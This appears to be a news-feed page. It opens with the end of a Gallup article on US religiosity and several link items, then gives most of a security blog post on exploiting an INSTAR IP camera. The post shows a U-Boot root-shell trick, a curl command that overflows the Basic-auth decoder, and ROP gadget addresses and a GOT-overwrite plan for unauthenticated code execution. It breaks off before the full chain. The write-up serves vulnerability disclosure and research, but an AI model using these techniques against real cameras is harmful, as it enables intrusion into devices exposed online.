At the same time, attitudes in the U.S. are drawing closer to those in other advanced economies. Across the 38 OECD (Organisation for Economic Co-operation and Development) countries in 2024, a median of 36% of adults said religion is important to their daily lives. The gap between the U.S. and the median for these countries is now narrower than at any point in Gallup’s trend.

U.S. Now Occupies Unique Spot in Global Religiosity

The long-term decline in religiosity places the U.S. in a unique position on the global religious landscape. Most countries fall into one of four patterns: high religiosity with Christian identity; high religiosity with another religious identity (often Muslim majority, although there are several countries in the Middle East where Gallup does not ask religious identity questions); low religiosity with Christian identity; or low religiosity with no religious identity.

The U.S. no longer fits neatly into any of these categories, having a medium-high Christian identity but middling religiosity. In terms of religious identity, the percentage of Americans now identifying as Christian is similar to those of Western and Northern European countries such as the United Kingdom, Germany, Finland and Denmark, nations with strong Protestant traditions. Yet religion continues to play a larger role in daily life for Americans than for people in those countries.

Conversely, the importance of religion in daily life in the U.S. resembles that of countries such as Argentina, Ireland, Poland and Italy — where Catholicism is more influential — but significantly fewer Americans now identify as Christian compared with those populations.

This marks a shift from 2008, when Gallup began consistently tracking people’s religious identity and religion’s role in daily life in most of the world. At that time, the U.S. aligned more closely with countries where religion was widely practiced and most adults identified as Christian.

Bottom Line

The steady decline in U.S. religiosity over the past decade has been evident for years. Fewer Americans identify with a religion, church attendance and membership are declining, and religion holds a less important role in people’s lives than it once did. But this analysis of World Poll data puts the decline in a wider context, showing just how large the shift has been in global terms. Since 2007, few countries have measured larger declines in religiosity.

This means the U.S. lags further behind the global median for religiosity and is drawing closer to the median for other advanced economies. The U.S. increasingly stands as an outlier: less religious than much of the world, but still more devout than most of its economic peers.


For complete methodology and specific survey dates, please review Gallup's Country Data Set details . Learn more about how the Gallup World Poll works.

Benedict Vigers is a senior global news writer at Gallup. Benedict's primary area of expertise is in Gallup's global public opinion research via The Gallup World Poll. He has published more than 50 news articles on global public opinion, focusing on a wide range of issues and countries from around the world.

Julie Ray has been writing and editing for more than 30 years — more than 20 of them for Gallup. She analyzes and writes about Gallup's global research — with an emphasis on migration — for international clients, leaders and the media.

AI note-taking startup Fireflies was really two guys typing notes by hand

Hacker News
www.pcgamer.com
2025-11-15 02:11:43
Comments...
Original Article

AI note-taking startup Fireflies received a $1 billion valuation earlier this year, after the launch of its "Talk to Fireflies" AI meeting companion app. It's an impressive feat for a company started by "two broke guys"—especially as one of its co-founders recently revealed that its AI transcription service was originally powered by both founders typing the notes out by hand.

"We charged $100 a month for an AI that was really just two guys surviving on pizza," Firefly co-founder Sam Udotong proudly declared in a LinkedIn post earlier this week (via Futurism ).


Or, y'know, provide the AI service they promised their clients they would receive. And while it's tempting to cheer on the success of two young hopefuls doing their darndest to take the principle of "fake it 'til you make it" to the extreme, a scroll through the comments reveals the potential pitfalls of declaring such a scheme.

"Sitting in someone's meeting uninvited is violation of privacy. They wanted a bot in the meeting, not an uninvited person," said automation expert Umar Aftab. "This way you sabotage trust and could incur legal implications."


"Good luck with all the lawsuits," added another. "This might read like a gritty founder hustle story," said software engineer Mauricio Idarraga. "But it's actually one of the most reckless and tone-deaf posts I've seen in a while."

As Udotong's post is now beginning to be widely reported across the interwebs, I can't imagine it'll be long before one of Fireflies' original customers reads about their now-public hoodwinking, and I doubt they'll be particularly pleased. However, some LinkedIn commenters seem to see very little wrong with Fireflies' dubious early business practices.

"Super inspirational story," says another co-founder and CEO. "Haters will always hate. And most others won't understand what it takes to build from 0-1 while trying to survive as humans. In the end, your grit paid off immensely—and you have changed the world."

Hmm, I'm not so sure about that one. Still, it's certainly got people talking, at the very least. Is there really no such thing as bad publicity? I guess we'll just have to wait and see.


The Information: Second-Gen iPhone Air Postponed Until Spring 2027, but Might Gain Second Camera

Daring Fireball
www.theinformation.com
2025-11-15 02:09:38
Wayne Ma and Qianer Liu, reporting for The Information on Tuesday (paywalled, alas, but summarized by 9to5Mac here and here): Apple has since sharply scaled back production of the first iPhone Air and delayed the release of an updated version that was meant to launch in fall 2026, The Informatio...

Show HN: A visual guide to learning Jujutsu (JJ)

Hacker News
excalidraw.com
2025-11-15 00:32:04
Comments...

Friday Squid Blogging: Pilot Whales Eat a Lot of Squid

Schneier
www.schneier.com
2025-11-14 23:33:12
Short-finned pilot wales (Globicephala macrorhynchus) eat at lot of squid: To figure out a short-finned pilot whale’s caloric intake, Gough says, the team had to combine data from a variety of sources, including movement data from short-lasting tags, daily feeding rates from satellite tags, bo...
Original Article

Short-finned pilot whales (Globicephala macrorhynchus) eat a lot of squid:

To figure out a short-finned pilot whale’s caloric intake, Gough says, the team had to combine data from a variety of sources, including movement data from short-lasting tags, daily feeding rates from satellite tags, body measurements collected via aerial drones, and sifting through the stomachs of unfortunate whales that ended up stranded on land.

Once the team pulled all this data together, they estimated that a typical whale will eat between 82 and 202 squid a day. To meet their energy needs, a whale will have to consume an average of 140 squid a day. Annually, that’s about 74,000 squid per whale. For all the whales in the area, that amounts to about 88,000 tons of squid eaten every year.

Research paper .

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.


USDA head says 'everyone' on SNAP will now have to reapply

Hacker News
thehill.com
2025-11-14 22:44:38
Comments...

No Leak, No Problem - Bypassing ASLR with a ROP Chain to Gain RCE

Lobsters
modzero.com
2025-11-14 22:43:18
Comments...
Original Article

After my previous post on ARM exploitation, where we crafted an exploit for a known vulnerability, I decided to continue the research on a more modern IoT target. In this follow-up post, I will take you through building a considerably more complex binary exploit. We will explore the path from firmware extraction and analysis to the discovery of a previously unknown vulnerability and its exploitation. Follow along as we build an ARM ROP chain to bypass ASLR without an address leak, and achieve unauthenticated RCE.

Target Overview

I examined the IN-8401 2K+, an IP camera from the German manufacturer INSTAR. It’s a modern networked surveillance camera that exposes a web-based user interface for configuration and live view. As I later found, this particular model shares its firmware with other devices from INSTAR’s 2K+ and 4K series. According to Shodan 1 , there are roughly 12,000 INSTAR devices visible on the public internet.

INSTAR IN-8401 2K+ web interface

Cracking the Shell Open

Before we can meaningfully hunt for vulnerabilities, we need to gain access to the device to obtain its firmware. Access to the firmware exposes binaries, configuration files, scripts and the filesystem layout and enables both static inspection and dynamic testing. Without the firmware we’re stuck with blind fuzzing of the network interface.

It’s always a good idea to collect as much information as possible before diving into analysis mode. So I started with some reading. INSTAR provides quite an extensive documentation about its cameras and their features. I found a very interesting page titled “Restore your HD Camera after a faulty Firmware upgrade” 2 . The article explained that the camera exposes a UART interface and how it could be accessed to restore a firmware image. UART is a hardware interface used for serial communication commonly found on development boards, embedded systems, and debugging interfaces. In the documentation it looked like it’s possible to boot right into a root shell.

Although the article was written for the HD camera models, not my 2K+, I figured it might be worth a shot, since manufacturers often reuse features and components across different product versions. I removed the front part of the housing and spotted the debugging interface as shown on the wiki page.

I went ahead and attached some PCBites to the interface and connected them to an FTDI, which is a small USB-to-serial converter.

Attaching FTDI to exposed UART interface

I then plugged the FTDI into my Linux machine and connected to it. After supplying some input over the serial connection I was greeted with a login prompt, cool!

INSTAR login: root
Password:
Login incorrect

I tried a couple of the usual combinations like admin:admin, root:root, and so on, but had no success. The documentation explained that the boot process could be interrupted to obtain a root shell on the device’s OS. So I rebooted the camera to see if that worked.

U-Boot 2019.04 (Oct 18 2023 - 11:38:25 +0000)

CPU:   Novatek NT @ 999 MHz
DRAM:  512 MiB
Relocation to 0x1ff3b000, Offset is 0x01f3b000 sp at 1fbf4dc0
nvt_shminfo_init:  The fdt buffer addr: 0x1fbfb8c8
ARM CA9 global timer had already been initiated
otp_init!
120MHz
otp_timing_reg= 0xff6050
 CONFIG_MEM_SIZE                =      0x20000000
 CONFIG_NVT_UIMAGE_SIZE         =      0x01900000
 CONFIG_NVT_ALL_IN_ONE_IMG_SIZE =      0x14a00000
 CONFIG_UBOOT_SDRAM_BASE        =      0x1e000000
 CONFIG_UBOOT_SDRAM_SIZE        =      0x01fc0000
 CONFIG_LINUX_SDRAM_BASE        =      0x01100000
 CONFIG_LINUX_SDRAM_SIZE        =      0x1cf00000
 CONFIG_LINUX_SDRAM_START       =      0x1c700000
[...]
phy interface: INTERNAL MII
eth_na51055
Hit any key to stop autoboot:  0
 do_nvt_boot_cmd: boot time: 1718855(us)
 [...]

As you can see there was indeed a mechanism to stop the device from autobooting. But contrary to what the documentation suggested, interrupting the boot process didn’t provide a root shell on the OS, only in the U-Boot bootloader. U-Boot (short for Universal Bootloader) is an open-source bootloader commonly used in embedded systems to initialize hardware and load the operating system or firmware during startup.

nvt@na51055: printenv
arch=arm
[...]
bootargs=console=ttyS0,115200 earlyprintk nvt_pst=/dev/mmcblk2p0
nvtemmcpart=0x40000@0x40000(fdt)ro,0x200000@0xc0000(uboot)ro,0x40000@0x2c0000(uenv),0x400000@0x300000(linux)ro,0x40000000@0xb00000(rootfs0),0xc000000@0x40b00000(rootfs1),0x40000000@0x4cb00000(rootfs2),0x1000000@0x8CF00000(rootfsl1),0x10000000@0x8E300000(rootfsl2),0xe6a340@0(total) root=/dev/mmcblk2p1 rootfstype=ext4 rootwait rw
bootcmd=nvt_boot
[...]
vendor=novatek
ver=U-Boot 2019.04 (Oct 18 2023 - 11:38:25 +0000)

I noticed that the kernel boot parameters were provided by an environment variable called bootargs . I went ahead and tried the init=/bin/sh trick, which tells the kernel to start a shell instead of the init process. I updated the variable accordingly and tried to boot using nvt_boot .

nvt@na51055: setenv bootargs "console=ttyS0,115200 earlyprintk nvt_pst=/dev/mmcblk2p0
nvtemmcpart=0x40000@0x40000(fdt)ro,0x200000@0xc0000(uboot)ro,0x40000@0x2c0000(uenv),0x400000@0x300000(linux)ro,0x40000000@0xb00000(rootfs0),0xc000000@0x40b00000(rootfs1),0x40000000@0x4cb00000(rootfs2),0x1000000@0x8CF00000(rootfsl1),0x10000000@0x8E300000(rootfsl2),0xe6a340@0(total) root=/dev/mmcblk2p1 rootfstype=ext4 rootwait rw init=/bin/sh"
nvt@na51055: nvt_boot
[...]
EXT4-fs (mmcblk2p1): recovery complete
EXT4-fs (mmcblk2p1): mounted filesystem with ordered data mode. Opts: (null)
VFS: Mounted root (ext4 filesystem) on device 179:1.
devtmpfs: mounted
Freeing unused kernel memory: 1024K
Run /bin/sh as init process
/bin/sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # hostname
INSTAR

It worked. I added a new root user and rebooted the device. Now I was able to login to the device using the newly created user. I dumped the whole filesystem for analysis and as a backup so I could also restore it later, if anything went wrong along the way.

High-Level Architecture & Attack Surface

With the device unlocked and open for exploration it’s very easy to get swept away by curiosity. With the goal of finding exploitable vulnerabilities in mind it’s important to lay out something like an attack surface map first.

The web stack consisted of various components, most prominently a lighttpd web server that acted as an entry point and reverse proxy. I started by inspecting its configuration to see what it was doing. As you would expect from a reverse proxy, incoming requests were forwarded to the appropriate backend. For example, requests to files ending with .cgi were routed to the fcgi_server binary through a socket at /tmp/instt_fcgi.socket .

fastcgi.server = ( ".cgi" => ((
"bin-path" => "/home/ipc/bin/fcgi_server",
"socket" => "/tmp/instt_fcgi.socket",
"max-procs" => 1,
"check-local" => "disable"
))

I was mainly interested in finding code that was reachable without authentication. From my initial exploration I knew that there was an SQLite database file where the web interface users were stored, so the binary that performed authentication had to access this file. However, I couldn’t confirm that fcgi_server was interacting with it. I concluded another component must be involved. In the process list I noticed a process called ipc_server . I attached strace to see what it was doing and found that incoming requests for most endpoints were forwarded from fcgi_server to ipc_server via /tmp/insttv2_socket .

As an example:

$ curl '192.168.0.3/param.cgi?cmd=mod0&paramkey=paramvalue'
cmd="mod0";
response="204";

On ipc_server’s end:

recv(91, "\4cmd\0\3\5\0\0\0mod0\0\6param\0\4\32\0\0\0\tparamkey\0\3\v\0\0\0paramvalue\0\7header\0\4\25\0\0\0\3ip\0\3\f\0\0\000192.168.0.1\0", 87, 0) = 87

As you can observe, the HTTP request wasn’t forwarded as-is; it was first serialized using some type of Type–Length–Value (TLV) structure. These observations also made it clear that authentication and the core application logic reside in the ipc_server backend.
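For illustration, here is one plausible way such a field could be encoded, inferred purely from the recv() dump above. The exact field layout (a length-prefixed, NUL-terminated key, a type byte, and a 4-byte little-endian value length) is an assumption, not confirmed protocol documentation.

import struct

# Hypothetical encoder for the TLV-like format observed in the recv() call.
# Assumed layout per field: [1-byte key length incl. NUL][key][NUL]
#                           [1-byte type][4-byte LE value length][value][NUL]
def tlv_field(key: bytes, value: bytes, type_id: int = 3) -> bytes:
    key_z = key + b"\x00"
    val_z = value + b"\x00"
    return bytes([len(key_z)]) + key_z + bytes([type_id]) + struct.pack("<I", len(val_z)) + val_z

# Should reproduce the "cmd" field seen above: \x04cmd\x00\x03\x05\x00\x00\x00mod0\x00
print(tlv_field(b"cmd", b"mod0"))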

With this, I had identified two interesting targets: fcgi_server and ipc_server , both of which were reachable by an unauthenticated attacker.

Methodology

With the two main targets fcgi_server and ipc_server identified we can now focus on searching for vulnerabilities. In this section I want to quickly touch on the methods I employed for doing so.

Probably one of the most important ingredients for efficient vulnerability hunting is having a proper debugging setup in place. This allows for quickly double-checking any assumptions made during static analysis, tracing calls, and so on. I ran more or less an identical setup to the one used in the last research with a gdb server on the IP camera and a gdb client on the attacker’s machine.

For this research I primarily used two approaches: fuzzing, and a combination of static and dynamic analysis. I started off with something that I would call a very primitive way of black-box fuzzing using boofuzz 3 on collected web endpoints. I tried fuzzing through all possible parameters I had found on various endpoints to see if I could trigger a crash. Although this approach yielded CVE-2025-8761 4 , I felt like it was very inefficient as a crash of the whole system was the only thing I was able to reliably detect (more on that later).
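To give an idea of what this primitive approach looks like in practice, here is a minimal sketch of parameter fuzzing against the param.cgi endpoint shown earlier. This is not the actual boofuzz setup used in this research, just an illustration of the idea; the endpoint and parameter names come from the examples in this post, everything else is assumed.

import requests

# Illustrative black-box parameter fuzzer (not the boofuzz setup used here).
TARGET = "http://192.168.0.3"
PARAMS = ["cmd", "paramkey"]              # collected parameter names (examples)
LENGTHS = [64, 512, 1024, 4096, 16384]

for name in PARAMS:
    for n in LENGTHS:
        try:
            r = requests.get(f"{TARGET}/param.cgi",
                             params={name: "A" * n}, timeout=5)
            print(name, n, r.status_code, len(r.content))
        except requests.RequestException as exc:
            # From the outside, a dropped connection or timeout is the only
            # reliable crash signal, which is exactly the limitation
            # described above.
            print(name, n, "no response:", exc)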

As a secondary approach I spent quite some time on reverse engineering the two binaries fcgi_server and ipc_server . I tried to get an understanding of how things work while focusing on the usual suspects for memory corruption like bounds checking, pointer arithmetic, etc. To speed things up my process usually involved examining the decompiled binary, making assumptions, and verifying them using gdb and strace dynamically.

Vulnerability Hunting

Let’s have a look at some code. As described earlier fcgi_server acted as some sort of custom middleware that translated web requests into ipc messages. In the decompiled binary I found a dispatcher for .cgi endpoints which called certain handler functions based on the given URI.

Dispatcher function in decompiled fcgi_server binary

In most of the handler functions a similar pattern emerged. Inside each handler there was a call to the same function which looked like another dispatcher. I identified the second dispatcher as some sort of authentication handler.

Update handling function in decompiled fcgi_server binary

I assumed that the code had to extract and serialize the corresponding auth data from HTTP requests differently, depending on the authentication mechanism used. There were several different handlers, one of which I identified as the basic auth handler.

Auth handler function in decompiled fcgi_server binary

Inside the basic auth handler, there was a call to another function that looked like a custom implementation of Base64 decoding. As you might have noticed, the decompiled code contained typical C++ elements such as class methods, this pointers, and references to the C++ standard library. Most of the string-related functionality I had seen so far was therefore using C++’s standard string handling. In this case, however, I noticed a memcpy that copied the decoded Base64 result into a fixed-size buffer (516 bytes) located on the stack.

Base64 decoding function in decompiled fcgi_server binary

Without spending much more time on static analysis, I moved on to perform some dynamic testing of the basic authentication functionality. First, I needed to verify my assumption that the basic auth handler and Base64 decode function were being triggered, so I set a few breakpoints and sent a request.

$ curl -k https://192.168.0.3/castore.cgi -u 'A:B' -v
[...]
* Request completely sent off
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
< HTTP/2 500
< content-type: text/plain; charset=utf-8
[...]
< server: lighttpd/1.4.72

The breakpoints triggered which confirmed my assumptions so far and I got back a 500.

Then I sent another request with a very long basic auth string exceeding the 516-byte buffer length in the Base64 decode function.

$ curl -k https://192.168.0.3/castore.cgi -u 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:B' -v
[...]
* Request completely sent off
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
< HTTP/2 500
< content-type: text/html
[...]
< server: lighttpd/1.4.72
<
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
 <head>
  <title>500 Internal Server Error</title>
 </head>
 <body>
  <h1>500 Internal Server Error</h1>
 </body>
</html>

I got back another 500. However, the response wasn’t the same, this time it included an HTML error message. Strange, right? Let’s have a look at what the serial terminal showed.

Hardware name: Novatek Video Platform
PC is at 0x41414140
LR is at 0x76e39e8c
pc : [<41414140>]    lr : [<76e39e8c>]    psr: 60010030
sp : 753808d0  ip : 76e6f48c  fp : 41414141
r10: 41414141  r9 : 41414141  r8 : 41414141
r7 : 41414141  r6 : 41414141  r5 : 41414141  r4 : 41414141
r3 : 00000000  r2 : 75380698  r1 : 00000000  r0 : 75380698
Flags: nZCv  IRQs on  FIQs on  Mode USER_32  ISA Thumb  Segment user
Control: 10c5387d  Table: 4dbdc04a  DAC: 00000055
CPU: 1 PID: 6392 Comm: fcgi_server Tainted: P           O      4.19.91 #1
Hardware name: Novatek Video Platform
Backtrace:
[<8010b428>] (dump_backtrace) from [<8010b554>] (show_stack+0x18/0x1c)
 r7:41414140 r6:60070013 r5:00000000 r4:808405e4
[...]

What happened? The program had crashed. PC is at 0x41414140 indicates that I had overwritten the stack, since the code took the return address from the stack and tried jumping to it: in this case 0x41414140, which corresponds to the payload sent. I had found a stack-based buffer overflow.

Why hadn’t I discovered this vulnerability during my initial fuzzing? I figured there were two reasons:

  • The HTTP status code was the same as for a normal request, only the response body differed. So getting a 500 response to the request was nothing unusual.
  • The lighttpd server immediately restarted fcgi_server , so the crash wasn’t noticeable from an outside perspective.

This once again highlights the importance of a proper debugging setup.
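Based on these two observations, a crash can still be detected from the outside by looking at the response body rather than the status code: a healthy fcgi_server answers with a plain-text 500, while a crashed one makes lighttpd serve its own HTML error page. A rough sketch of such a check (host and endpoint as used above, everything else illustrative):

import base64
import requests

# Rough crash oracle based on the observation above: both requests return
# HTTP 500, but only a crashed fcgi_server results in lighttpd's HTML error page.
def fcgi_crashed(auth_blob: bytes) -> bool:
    hdr = {"Authorization": "Basic " + base64.b64encode(auth_blob).decode()}
    r = requests.get("https://192.168.0.3/castore.cgi", headers=hdr,
                     verify=False, timeout=10)
    return "text/html" in r.headers.get("content-type", "")

print(fcgi_crashed(b"A:B"))              # expected: False (plain-text 500)
print(fcgi_crashed(b"A" * 600 + b":B"))  # expected: True (overflow, HTML 500)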

Exploitation

Before we jump to the fun part, a quick heads-up: if you’re not familiar with binary exploitation or the ARM architecture, I’d recommend having a look at the previous blog post 5 first, as many concepts are similar to those from the previous research and won’t be described in detail in this post.

Let’s first discuss the preconditions of exploiting the discovered stack-based buffer overflow. We’re dealing with an ARMHF 32 bit binary, dynamically linked and stripped. As shown by checksec the target binary isn’t protected by stack canaries, but does have the NX mitigation enabled. It isn’t compiled as a position independent executable (PIE) and has partial relocation read-only (RELRO).

$ file fcgi_server
fcgi_server: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-armhf.so.3, for GNU/Linux 4.9.0, stripped
$ checksec --file=fcgi_server
RELRO           STACK CANARY      NX            PIE
Partial RELRO   No canary found   NX enabled    No PIE

What does this mean for us as attackers? Overwriting return addresses on the stack with an overflow is straightforward because of the lack of stack canaries. However, we can’t execute shellcode on the stack. Also, the binary will always be placed in the same memory region, because it wasn’t compiled as a PIE. Finally, partial RELRO means that the global offset table (GOT) comes before the BSS section in memory, which holds uninitialized global and static variables. This eliminates the risk of a buffer overflow from a global variable overwriting GOT entries 6 . Since our overflow is on the stack, this doesn’t really matter to us. What does matter though, is that it also means that the GOT is writable. Only full RELRO provides a read-only GOT.

Let’s also have a look at the libraries included by the target binary such as the libc. We can see that libc was compiled with PIE, meaning that it can be placed randomly in memory during runtime.

$ checksec --file=libc-2.29.so
RELRO           STACK CANARY      NX            PIE
Partial RELRO   Canary found      NX enabled    DSO

Evidently, when looking at the mitigations in place, it makes sense to consider a Return-oriented programming (ROP) chain to achieve command execution. A ROP chain leverages small code snippets, or gadgets, already present in a program’s memory. By linking these gadgets, an attacker constructs an unintended, attacker-controlled execution flow. The effectiveness of a ROP chain depends on the availability of suitable gadgets and the attacker’s knowledge of their memory addresses.

In our case we could use gadgets from the target binary ( fcgi_server ) itself because their addresses are static and therefore known. These gadgets are quite limited though and eventually we would need to call file I/O functions or system() provided by libc to gain command execution. Note that libc was compiled with PIE. I quickly confirmed on the device that address space layout randomization (ASLR) was enabled, so libc was indeed placed at a random address in memory.

I came up with a couple of ideas on how to deal with this:

  • Find a libc address leak through another vulnerability
  • Find a file read for /proc/self/maps
  • Leak a libc address through a ROP chain

Unfortunately, I couldn’t quickly find another vulnerability that would let me leak a libc address. I considered reading /proc/self/maps to locate libc, but that proved unsuccessful. I also looked into using gadgets in the target binary to build a ROP chain to leak a libc address. However, there was no straightforward way to exfiltrate the leaked pointer.

A bigger issue was that any ROP chain would eventually crash the binary, rendering the leak useless because libc would be relocated on the next start of fcgi_server . In a stack-based buffer overflow, it’s also impossible to restore the stack to its previous state, as the very information required for restoration is overwritten.

One approach often used in this kind of scenario is to trigger the bug multiple times to prolong the crash: trigger it once to leak an address, then return to the vulnerable function and trigger the overflow again to make use of the leak. However, that approach requires an I/O channel to read the leak and then supply input again. Given the web-stack architecture we discussed and the bug’s location, that wasn’t feasible, so I concluded a one-shot exploit was likely the only viable option.

The Plan

There are several known techniques that revolve around the GOT and Procedure Linkage Table (PLT) to bypass ASLR. When a call to an external function such as puts (libc) is made, the immediate call goes to puts@plt which acts as a resolver of the actual address of puts within libc. The resolved address is then stored in the GOT. If a specific function has already been resolved previously it is taken from the GOT by the puts@plt stub 7 .

So the information needed to bypass ASLR lives in the GOT. Ideally we’d find the address of system there, but the target binary never references system , so it has no GOT/PLT entry. Instead, we could read a GOT entry for another function, compute the offset from that function to our target, and use that to redirect execution to the target. But all of this must be done via a ROP chain built from gadgets available in the binary.

The high level steps would look something like this:

  • Read a GOT entry and store in register x
  • Increment/decrement register x to reach target function (eg. addition, multiply, etc.)
  • Jump to x

Or another approach:

  • Increment/decrement value pointed to by GOT pointer to reach target function (GOT is writable)
  • Dereference GOT pointer into register x
  • Jump to x

This is still a vast simplification; we would need to move arguments into the correct registers and so on before jumping to the target function system(), but it’s a starting point.

Finding the Pieces

To pursue this idea I first wanted to find a GOT entry that is already populated when triggering the vulnerability. Within the vulnerable base64 decode function there is a call to isalnum which is a libc function. Let’s have a look at its PLT and GOT entries.

Using objdump we can see the address of the PLT entry of isalnum inside fcgi_server :

objdump -d fcgi_server| grep '<isalnum@plt>'
000147e8 <isalnum@plt>:
   206c8:       ebffd046        bl      147e8 <isalnum@plt>
   21010:       ebffcdf4        bl      147e8 <isalnum@plt>

To verify the corresponding GOT entry and actual address at runtime I set a breakpoint at the return statement after the overflow.

(remote) gef➤  info address isalnum@got.plt
Symbol "isalnum@got.plt" is at 0x400c8 in a file compiled without debugging.
(remote) gef➤  x/wx 0x400c8
0x400c8 <isalnum@got.plt>:      0x76ba86f0
(remote) gef➤  x/8i 0x76ba86f0
   0x76ba86f0 <isalnum>:        ldr     r3, [pc, #24]   @ 0x76ba8710 <isalnum+32>
   0x76ba86f4 <isalnum+4>:      mrc     15, 0, r2, cr13, cr0, {3}
   0x76ba86f8 <isalnum+8>:      lsl     r0, r0, #1
   0x76ba86fc <isalnum+12>:     ldr     r3, [pc, r3]
   0x76ba8700 <isalnum+16>:     ldr     r3, [r2, r3]
   0x76ba8704 <isalnum+20>:     ldrh    r0, [r3, r0]
   0x76ba8708 <isalnum+24>:     and     r0, r0, #8
   0x76ba870c <isalnum+28>:     bx      lr

As you can see the GOT entry is at 0x400c8 which points to the actual address of isalnum at 0x76ba86f0 within libc.

(remote) gef➤  info function system
All functions matching regular expression "system":

Non-debugging symbols:
0x000147c4  std::_V2::system_category()@plt
[...]
0x76bbb920  __libc_system
0x76bbb920  system
0x76c83fac  svcerr_systemerr

Let’s see how far apart that isalnum (0x76ba86f0) and system (0x76bbb920) are.

>>> hex(0x76bbb920 - 0x76ba86f0)
'0x13230'

So that means that if we can add 0x13230 to the address at isalnum@got we have the address of system .
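As a side note, the same numbers can be recovered offline from the files dumped earlier, without a live gdb session, for example with pwntools (a sketch, assuming the dumped libc-2.29.so and fcgi_server are available locally; the printed values should match what we just saw in gdb and objdump):

from pwn import ELF

# Recompute the isalnum -> system offset and the GOT/PLT addresses offline,
# using the binaries dumped from the device.
libc = ELF("libc-2.29.so")
binary = ELF("fcgi_server")

offset = libc.symbols["system"] - libc.symbols["isalnum"]
print(hex(offset))                     # 0x13230
print(hex(binary.got["isalnum"]))      # 0x400c8 (isalnum@got)
print(hex(binary.plt["isalnum"]))      # 0x147e8 (isalnum@plt)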

Gadgets, Gadgets and more Gadgets

Now to the tedious part. The only thing between the high-level plan and RCE was a bunch of gadgets, right? I initially tried tools such as angrop 8 to find and automatically chain gadgets, but ARM assembly offers many different, often multi-instruction ways to perform simple operations, e.g. add to a register or move values between registers. Those tools handle obvious, straightforward gadgets well, but they struggle once the gadget sequences become more complex. So in the end I reverted to manually searching and chaining gadgets with Ropper 9 .

If no short, straightforward gadgets are available, you must resort to longer ones. Typically, the longer a gadget is, the more side effects it has, for example, overwriting registers or changing the stack pointer. The challenge is therefore to find gadgets that implement the required primitive while introducing only manageable side effects that later gadgets can correct.

The most crucial gadget in my chain was the one to add two values, preferably fully controllable. This would let me add the calculated offset to the address at isalnum@got to get the address of system . While there were a couple of gadgets to add static values like 0x1 or 0x2 to a register, these didn’t seem very useful because either a loop would be required to call them many times or the chain would become too long to reach the desired value. So I tried to find gadgets that added values from two registers such as the following one.

# 0x000228d8: add r6, fp, r6; ldrb sb, [ip, #1]; ldr sl, [ip, #2]; blx r3;

Let’s break that down:

  • add r6, fp, r6 : Adds fp (r11) and r6, stores result in r6
  • ldrb sb, [ip, #1] : Dereferences ip (r12) + 1 byte, stores result in sb (r9)
  • ldr sl, [ip, #2] : Dereferences ip (r12) + 2 word, stores result in sl (r10)
  • blx r3 : Jumps to r3

As you can see here side effects can also mean that certain registers have to contain certain values beforehand. In this case ip (r12) has to contain a valid address that can be dereferenced. If that’s not the case, the program will crash.

So we have a gadget that allows us to add fp (r11) and r6. Ideally we want the address of isalnum in r6 and the offset we calculated earlier in fp (r11), giving us the address of system in r6 as the output of the gadget. But how do we get the address of isalnum into r6? The address of isalnum@got is known, so we need a gadget to dereference it to obtain the address of isalnum within libc.

To accomplish this, let’s have a look at this gadget:

# 0x000190ac: ldr r6, [r3, #0x10]; ldr r3, [r2, #4]; blx r3;

Breakdown:

  • ldr r6, [r3, #0x10] : Dereferences (r3 + 0x10), stores result in r6
  • ldr r3, [r2, #4] : Dereferences (r2 + 0x4), stores result in r3
  • blx r3; : Jumps to r3

Exactly what we need, but as you can tell this gadget needs some specific preparation beforehand. To continue the chain with blx r3 we need to make sure *(r2 + 0x4) results in the next gadget of the chain. But that should be doable.

Last but not least we need a gadget to jump to the calculated address. Unfortunately I simply couldn’t find one. I also couldn’t find ways of moving the address into another register for which call gadgets would exist. So where to go from here? I recalled that the GOT of the target binary is actually writable. So what about writing it back to the GOT? If that works we could just call isalnum@plt which would then load the altered address from the GOT and jump to it.

Let’s try, here’s another gadget:

# 0x0002a3f8: str r0, [r4, #4]; pop {r4, r5, r6, pc};

Breakdown:

  • str r0, [r4, #4] : Stores the value of r0 at *(r4 + 0x4)
  • pop {r4, r5, r6, pc} : Continues the chain

This gadget enables us to store the value in r0 at *(r4 + 0x4) . Provided we find gadgets to move our calculated address into r0 and isalnum@got - 0x4 into r4, this allows us to write the tampered address back to the GOT.

So if we could make everything line up the plan would be:

  • Dereference isalnum@got entry and store it in r6
  • Add the calculated offset to system to the register r6
  • Write the register r6 back to the GOT -> isalnum@got
  • Prepare function arguments for system
  • Call isalnum@plt

Building the Chain

The path wasn’t as straightforward as this write-up might imply. I spent quite some time trying to mix and match gadgets and even exchanged the ones discussed above numerous times until I came up with the following chain. Let me walk you through it.

